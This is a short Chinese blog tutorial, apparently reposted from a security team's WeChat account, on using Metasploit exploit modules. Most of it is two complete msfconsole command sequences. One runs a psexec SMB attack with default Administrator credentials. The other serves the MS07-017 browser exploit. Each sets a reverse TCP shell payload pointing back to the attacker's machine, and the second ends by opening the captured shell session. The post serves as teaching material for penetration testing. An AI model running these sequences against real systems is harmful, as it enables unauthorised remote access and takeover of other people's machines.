metasploit framework——exploit模块

admin 2022年12月2日14:28:16评论43 views字数 1363阅读4分32秒阅读模式

metasploit framework——exploit模块


前言

本节学习exploit模块

1、active exploit

攻击者主动向目标机发起exploit

service postgresql start #启动数据库msfconsole #启动msfmsf > use exploit/windows/smb/psexec #用这个exploitmsf exploit(psexec) > show options #查看msf exploit(psexec) > set RHOST 192.168.1.114 #目标机win2003msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp #选择payload,反弹shellmsf exploit(psexec) > set LHOST 192.168.1.113 #kalimsf exploit(psexec) > set LPORT 4444 #端口msf exploit(psexec) > set SMBUSER Administrator #账户msf exploit(psexec) > set SMBPASS 123456 #密码msf exploit(psexec) > exploit

2、passive exploit

目标机访问服务器,服务器上的利用漏洞代码返回目标机

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksizemsf exploit(ms07_017_ani_loadimage_chunksize) > set URIPATH /msf exploit(ms07_017_ani_loadimage_chunksize) > set SRVHOST 192.168.1.113 msf exploit(ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcpmsf exploit(ms07_017_ani_loadimage_chunksize) > set EXITFUNC threadmsf exploit(ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.113msf exploit(ms07_017_ani_loadimage_chunksize) > set LPORT 4444msf exploit(ms07_017_ani_loadimage_chunksize) > exploitmsf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1 #打开反弹过来的shell

结语

主要就是寻找合适的插件,设置,使用






   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):metasploit framework——exploit模块

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月2日14:28:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   metasploit framework——exploit模块https://cn-sec.com/archives/1434703.html

发表评论

匿名网友 填写信息